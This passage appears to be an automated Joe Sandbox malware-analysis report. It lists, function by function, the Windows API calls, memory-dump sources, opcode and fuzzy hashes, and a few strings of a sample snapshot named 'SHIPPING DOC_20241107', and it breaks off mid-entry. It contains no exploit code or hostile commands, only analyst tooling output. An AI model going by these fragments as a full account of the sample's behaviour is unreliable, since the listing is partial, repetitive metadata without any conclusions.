                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3382505437-0
                                                                                                                              • Opcode ID: a698a3fa98af3c36925d3c745321c511d22891131d9feb74fde2138fe3e7aa83
                                                                                                                              • Instruction ID: 1124cf0019925bb2604437d9190502c64d72239f47c272b699690852ab55021b
                                                                                                                              • Opcode Fuzzy Hash: a698a3fa98af3c36925d3c745321c511d22891131d9feb74fde2138fe3e7aa83
                                                                                                                              • Instruction Fuzzy Hash: E631DC3190021DEFDB00CFA8ED49A9E3BB5EB14315F104329F964EA1E0C7B49914CB90
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00A0B4C6
                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A0B4E3
                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A0B51B
                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00A0B541
                                                                                                                              • _wcsstr.LIBCMT ref: 00A0B54B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3902887630-0
                                                                                                                              • Opcode ID: c59c7d70d5ce37a478b740d526f9868e54b3d10dfd6eb7ef0691b5eae71272e5
                                                                                                                              • Instruction ID: caf53466c76cca9f39b750e5e9ddef493453d8b71280da86cb9cd9c7ea603614
                                                                                                                              • Opcode Fuzzy Hash: c59c7d70d5ce37a478b740d526f9868e54b3d10dfd6eb7ef0691b5eae71272e5
                                                                                                                              • Instruction Fuzzy Hash: B2214C31654144BEEB259B79AD05F7B7BA8DF88710F10807AF805DA1E1EF61DC0193B0
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A095E2
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A09614
                                                                                                                              • __itow.LIBCMT ref: 00A0962C
                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A09654
                                                                                                                              • __itow.LIBCMT ref: 00A09665
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2983881199-0
                                                                                                                              • Opcode ID: c87832257dd1905d00ec6c3cd0c768514e4161450e2ae4a2e922ef06e1b9483d
                                                                                                                              • Instruction ID: 528dc7de0648e05fce559ea4f05a19a04ded642faa42290f59b06d6322850ae4
                                                                                                                              • Opcode Fuzzy Hash: c87832257dd1905d00ec6c3cd0c768514e4161450e2ae4a2e922ef06e1b9483d
                                                                                                                              • Instruction Fuzzy Hash: 5721B331B00218BBDB10ABA4DD8AEEF7BA9EF99720F044025F905D72D2DB718D418791
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(00000000), ref: 00A25B84
                                                                                                                              • GetForegroundWindow.USER32 ref: 00A25B9B
                                                                                                                              • GetDC.USER32(00000000), ref: 00A25BD7
                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00A25BE3
                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00A25C1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4156661090-0
                                                                                                                              • Opcode ID: c479cba2303bedf5fec1b30e6e4d0975771d3ac941f7be1cba1b0516db4fa453
                                                                                                                              • Instruction ID: 30cf9a740ff86b467f5270576da85b09c12aaccc4fbbddeebcd91e7b9501d946
                                                                                                                              • Opcode Fuzzy Hash: c479cba2303bedf5fec1b30e6e4d0975771d3ac941f7be1cba1b0516db4fa453
                                                                                                                              • Instruction Fuzzy Hash: 2C21A135A10114AFD704EFA9DE89A9ABBF5FF48310F048479F94A97262DB30AC01CB50
                                                                                                                              APIs
                                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 009B134D
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 009B135C
                                                                                                                              • BeginPath.GDI32(?), ref: 009B1373
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 009B139C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3225163088-0
                                                                                                                              • Opcode ID: 08ea8d32f5226acd32730a07c7917f31b415d075cd234ca1e17808082678d3cd
                                                                                                                              • Instruction ID: 1790f58ca61b7158c090eafd82bc2dffe5f9b890a5bb053150a4241e4de43ff0
                                                                                                                              • Opcode Fuzzy Hash: 08ea8d32f5226acd32730a07c7917f31b415d075cd234ca1e17808082678d3cd
                                                                                                                              • Instruction Fuzzy Hash: 8D216230C10608EFDB11CFA5ED547A97BE8FB00321F588626F414965B1E3B19992EF51
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A14B61
                                                                                                                              • __beginthreadex.LIBCMT ref: 00A14B7F
                                                                                                                              • MessageBoxW.USER32 ref: 00A14B94
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A14BAA
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A14BB1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3824534824-0
                                                                                                                              • Opcode ID: ff1bbd7b60b8519af7ce6e3f1c9739f07cf5bce0910b6ad4e0948c0e812cdae1
                                                                                                                              • Instruction ID: 85cb050da9309a2420a54a4957eddf36b8e0aab172412b93f58ef28224851652
                                                                                                                              • Opcode Fuzzy Hash: ff1bbd7b60b8519af7ce6e3f1c9739f07cf5bce0910b6ad4e0948c0e812cdae1
                                                                                                                              • Instruction Fuzzy Hash: 0211E172D08658BFC700DBFCDC48ADA7FACAB49320F148269F918D3251D6B1C98587A0
                                                                                                                              APIs
                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A08546
                                                                                                                              • GetLastError.KERNEL32(?,00A0800A,?,?,?), ref: 00A08550
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00A0800A,?,?,?), ref: 00A0855F
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00A0800A,?,?,?), ref: 00A08566
                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A0857D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 842720411-0
                                                                                                                              • Opcode ID: 22ad8c80a4c62fe547cc94858c24450828e9e90774fa74ffaede16e8c44203c3
                                                                                                                              • Instruction ID: 09a4bf1485cfd22cb7d3b559f850804845279f3d96b19f2b90e8feface6d5bdf
                                                                                                                              • Opcode Fuzzy Hash: 22ad8c80a4c62fe547cc94858c24450828e9e90774fa74ffaede16e8c44203c3
                                                                                                                              • Instruction Fuzzy Hash: 0E016D71610218FFDB218FA6EC49D6B7FACFF89355B14052AF949D2260DB329D01CA60
                                                                                                                              APIs
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A15307
                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A15315
                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A1531D
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A15327
                                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A15363
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2833360925-0
                                                                                                                              • Opcode ID: 28505ecf65cea924747d18b5fe70fd6fb9b7bdfb8a34902eeda8f7710b46b1cd
                                                                                                                              • Instruction ID: 2f05149ec19553547ddf5466b611485ffde1e5ba1ed43aeeb61d9709559e28d2
                                                                                                                              • Opcode Fuzzy Hash: 28505ecf65cea924747d18b5fe70fd6fb9b7bdfb8a34902eeda8f7710b46b1cd
                                                                                                                              • Instruction Fuzzy Hash: 86013532C11A19DBCF00EBF5EC98AEEBB78BF48701F05055AF955B7240CB709A9587A1
                                                                                                                              APIs
                                                                                                                              • CLSIDFromProgID.OLE32 ref: 00A0744F
                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00A0746A
                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A0736C,80070057,?,?), ref: 00A07478
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A07488
                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 00A07494
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3897988419-0
                                                                                                                              • Opcode ID: 5c96cbe1c78862a49e6e09e17de349a4c3d19c8eacbb05b19ec9f1cbff7914e2
                                                                                                                              • Instruction ID: 6bf221e5b96212717bcd19de6903cb2131a9c9a5591c49c13308ce58c4d69b20
                                                                                                                              • Opcode Fuzzy Hash: 5c96cbe1c78862a49e6e09e17de349a4c3d19c8eacbb05b19ec9f1cbff7914e2
                                                                                                                              • Instruction Fuzzy Hash: 17017176E11218BFDB109F64EC44AAE7FBDEB44752F144025FD09D6260D732ED419BA0
                                                                                                                              APIs
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A083E8
                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A083F2
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A08401
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A08408
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A0841E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 44706859-0
                                                                                                                              • Opcode ID: 938321be9cbc094240b37bc9b87aea948833568c3b8afff4a76a08459a4585ac
                                                                                                                              • Instruction ID: eb9e9cfb3de2372cad04bd8b073c0d8a0d155ecf6d1683dd8077615897c5fb1b
                                                                                                                              • Opcode Fuzzy Hash: 938321be9cbc094240b37bc9b87aea948833568c3b8afff4a76a08459a4585ac
                                                                                                                              • Instruction Fuzzy Hash: FFF0C234614209EFEB109FA4EC8DE6B3BACEF8A764B400135F985C61A0DB75DC46DA60
                                                                                                                              APIs
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A08449
                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A08453
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A08462
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A08469
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A0847F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 44706859-0
                                                                                                                              • Opcode ID: a8c85b9971eaae48837adba2f809c4cf2b990c7b8e0402bfd2001b42f46e5840
                                                                                                                              • Instruction ID: 3cfe3b340ee4cdb25f73773b984f6896ee137bb53f1ca2041ffff8e1a67f78b0
                                                                                                                              • Opcode Fuzzy Hash: a8c85b9971eaae48837adba2f809c4cf2b990c7b8e0402bfd2001b42f46e5840
                                                                                                                              • Instruction Fuzzy Hash: 50F0AF30210209EFEB115FA4ECC8E6B3FACEF4A754B040125F985C71A0DA619806DA70
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A0C4B9
                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A0C4D0
                                                                                                                              • MessageBeep.USER32(00000000), ref: 00A0C4E8
                                                                                                                              • KillTimer.USER32 ref: 00A0C504
                                                                                                                              • EndDialog.USER32 ref: 00A0C51E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3741023627-0
                                                                                                                              • Opcode ID: 2a1fd0bdbb60e57a29f5c07c0025eaeb2b6e20f42942050e1369ed8751f06d6d
                                                                                                                              • Instruction ID: 067eb6079b78811e46bb6c7ff29bf2494e2ae5c30cf5fddefe40322024674212
                                                                                                                              • Opcode Fuzzy Hash: 2a1fd0bdbb60e57a29f5c07c0025eaeb2b6e20f42942050e1369ed8751f06d6d
                                                                                                                              • Instruction Fuzzy Hash: D8018130950708ABEB209BA0ED4EFA6B7B8FF00715F000769F582A10E1DBF5B9558B80
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2625713937-0
                                                                                                                              • Opcode ID: 87aef69308c20a6cef7b859ab9dbea24e1743269363ea9e26bed6e752b00b188
                                                                                                                              • Instruction ID: 077d8850f9a5f9a7ee6ae095424afbfe4435b60abc87cf91584444c902509564
                                                                                                                              • Opcode Fuzzy Hash: 87aef69308c20a6cef7b859ab9dbea24e1743269363ea9e26bed6e752b00b188
                                                                                                                              • Instruction Fuzzy Hash: 34F0FB30804A08DFDB159FAAED587983FA9EB01326F48C224F429480B2D77045A6EF11
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00A1C4BE
                                                                                                                              • CoCreateInstance.OLE32(00A42D6C,00000000,00000001,00A42BDC,?), ref: 00A1C4D6
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              • CoUninitialize.OLE32 ref: 00A1C743
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 2683427295-24824748
                                                                                                                              • Opcode ID: d9244244f00b974f5e61e02f5244ac18a5fd8004aa02b5c19b5f2d1ccd6c5d1e
                                                                                                                              • Instruction ID: bb8697fba3a155a0f17a82cc6d1530f1cf88531e9e5160462732bc0aff30a0c3
                                                                                                                              • Opcode Fuzzy Hash: d9244244f00b974f5e61e02f5244ac18a5fd8004aa02b5c19b5f2d1ccd6c5d1e
                                                                                                                              • Instruction Fuzzy Hash: 8BA12A71118205AFD300EF64C991EABB7ECEFC5714F00491CF256972A2EB70EA49CB62
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D0F36: std::exception::exception.LIBCMT ref: 009D0F6C
                                                                                                                                • Part of subcall function 009D0F36: __CxxThrowException@8.LIBCMT ref: 009D0F81
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 009B7BB1: _memmove.LIBCMT ref: 009B7C0B
                                                                                                                              • __swprintf.LIBCMT ref: 009C302D
                                                                                                                              Strings
                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 009C2EC6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                              • Opcode ID: ec5e4224255277dbf438fa3501b62fe98e517ce2ba0c53222cab7b707af443b7
